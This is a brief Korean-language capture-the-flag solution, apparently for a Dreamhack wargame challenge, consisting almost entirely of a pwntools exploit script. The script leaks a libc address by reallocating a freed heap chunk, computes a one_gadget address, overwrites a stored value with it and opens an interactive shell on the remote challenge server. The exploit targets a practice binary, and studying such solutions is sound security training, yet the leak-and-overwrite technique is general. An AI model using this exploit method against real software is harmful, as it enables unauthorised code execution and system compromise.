구조가 이론 내용과 같다.
Pwntools Code
1. base
from pwn import * def custom(size, data, idx): p.recvuntil(b"> "); p.sendline(b"3") p.recvuntil(b"Size: "); p.sendline(str(size)) p.recvuntil(b"Data: "); p.send(data) p.recvuntil(b"idx: "); p.sendline(str(idx)) p=remote("host3.dreamhack.games", 14484)2. library leak + one_gadget
custom(0x500, "AAAA", -1) # 할당 custom(0x500, "AAAA", -1) # 할당 custom(0x500, "AAAA", 0) # 해제 p.recvuntil(b"> "); p.sendline(b"3") # 할당 p.recvuntil(b"Size: "); p.sendline(str(0x500)) p.recvuntil(b"Data: "); p.send("B"); p.recvuntil("B") lb=u64((b"\x42"+p.recvn(5)).ljust(8, b"\x00"))-0x3ebc42 p.sendline(str(-1)) og=lb+0x10a41c3. overwrite + get shell
p.sendlineafter("> ", "1") p.sendlineafter(b"Weight: ", b"1") p.sendlineafter(b"Age: ", str(og)) p.sendlineafter(b"> ", b"2") p.sendlineafter(b"Weight: ", b"1") p.interactive()
